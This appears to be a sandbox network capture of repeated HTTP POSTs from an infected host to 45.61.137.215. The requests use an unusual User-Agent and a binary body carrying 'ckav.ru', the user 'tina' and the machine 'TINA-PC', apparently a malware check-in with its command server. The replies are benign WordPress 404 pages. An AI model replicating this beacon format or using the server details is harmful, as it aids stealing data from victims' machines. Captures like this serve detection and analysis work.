May 29, 2024 15:45:34.409802914 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:45:34.409821033 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:45:34.409838915 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.9	49794	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:34.630779028 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:34.638835907 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:37.199265957 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:35 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:37.199301004 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:37.199318886 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:37.199336052 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:37.199353933 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:37.199587107 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:37.199604988 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:45:37.199620962 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:45:37.199695110 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:45:37.199712038 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.9	49795	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:37.356647015 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:37.361656904 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:39.772905111 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:37 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:39.772947073 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:39.772979975 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:39.773014069 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:45:39.773047924 CEST	224	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !impo
May 29, 2024 15:45:39.773149014 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:45:39.773178101 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:45:39.773915052 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:39.773946047 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:45:39.773978949 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.9	49796	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:39.931883097 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:39.936844110 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:42.445656061 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:40 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:42.445684910 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:42.445693970 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:42.445700884 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:42.445708990 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:42.445718050 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
